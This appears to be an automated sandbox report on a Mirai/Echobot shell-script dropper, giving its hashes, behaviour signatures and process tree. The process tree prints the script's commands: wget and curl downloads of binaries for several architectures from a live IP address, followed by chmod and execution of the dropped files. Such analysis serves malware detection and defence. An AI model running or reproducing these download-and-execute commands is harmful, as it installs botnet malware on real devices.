Overview

overview

10

Static

static

1

c6cb56d51a...c5c.sh

ubuntu-18.04-amd64

10

c6cb56d51a...c5c.sh

debian-9-armhf

10

c6cb56d51a...c5c.sh

debian-9-mips

10

c6cb56d51a...c5c.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    151s
  • max time network
    157s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    28-10-2024 03:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh

  • Size

    1KB

  • MD5

    a40d8e1695f7f86ab08feb9465a4d69e

  • SHA1

    48ce62e5415710d5b8d7f9d120842010f259909d

  • SHA256

    c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c

  • SHA512

    09e74caae29b43281aaca4e7a9a64667a85040184249c9cb9b9903109f8ec06782cbf7861129f905f895d8cc1516dab6969c2d9a174478c509b2d707e355268f

Score
10/10
echobotmiraibotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detected Echobot 2 IoCs
  • Echobot

    An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.

    botnettrojanechobot
  • Echobot family
    echobot
  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (124490) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 3 IoCs
  • Modifies Watchdog functionality 1 TTPs 4 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 2 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Changes its process name 2 IoCs
  • Reads system network configuration 1 TTPs 2 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 42 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh
    /tmp/c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh
    1⤵
    • Writes file to tmp directory
    PID:708
    • /usr/bin/wget
      wget http://5.59.248.145/bins/jade.x86
      2⤵
      • Writes file to tmp directory
      PID:714
    • /usr/bin/curl
      curl -O http://5.59.248.145/bins/jade.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:721
    • /bin/cat
      cat jade.x86
      2⤵
        PID:734
      • /bin/chmod
        chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.x86 systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-00wZiE
        2⤵
        • File and Directory Permissions Modification
        PID:736
      • /tmp/cp
        ./cp x86
        2⤵
        • Executes dropped EXE
        PID:737
      • /usr/bin/wget
        wget http://5.59.248.145/bins/jade.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:739
      • /usr/bin/curl
        curl -O http://5.59.248.145/bins/jade.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:741
      • /bin/cat
        cat jade.mips
        2⤵
        • System Network Configuration Discovery
        PID:742
      • /bin/chmod
        chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.mips jade.x86 systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-00wZiE
        2⤵
        • File and Directory Permissions Modification
        PID:743
      • /tmp/cp
        ./cp mips
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:744
      • /usr/bin/wget
        wget http://5.59.248.145/bins/jade.mpsl
        2⤵
        • Writes file to tmp directory
        PID:754
      • /usr/bin/curl
        curl -O http://5.59.248.145/bins/jade.mpsl
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:758
      • /bin/chmod
        chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.mips jade.mpsl jade.x86
        2⤵
        • File and Directory Permissions Modification
        PID:760
      • /tmp/cp
        ./cp mpsl
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        PID:761
      • /usr/bin/wget
        wget http://5.59.248.145/bins/jade.arm
        2⤵
        • Writes file to tmp directory
        PID:780
      • /usr/bin/curl
        curl -O http://5.59.248.145/bins/jade.arm
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:787

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /tmp/cp
      Filesize

      95KB

      MD5

      5059c698bfa13806cb55d8aa9e6b9b95

      SHA1

      15b9be86d584a4dc8dda5362652ede9a3394ed7c

      SHA256

      da981a689f7e31471175bb11492fd8d68cdef6c62c0bfba2e2abb920766841c6

      SHA512

      4c2ece09c98aa200ff3ea2df0da176f39d20cb76a3604503c6d1b2a977fdb611cb8647c5485558db63f63d4e10c634ad464aa9337d378eab6aecb9546ee45929

      Download Submit

    • /tmp/jade.x86
      Filesize

      68KB

      MD5

      9dae832b43230cdf6f41aeeb8aff1a30

      SHA1

      f399b7f5c4a08298d0a199ee27ab96a546f23c2e

      SHA256

      337f54805daa4730a201e251146a89820eb23aaa4604f681781c016b12c91c21

      SHA512

      ba90eb1d666d12933870c43acfb511ded11ce1c2105c2fda617865584713f31e323480e9c1e4cdbb6bdb5d694ed82b177e522a0e81c8486c90e1c1e9e54e521b

      Download Submit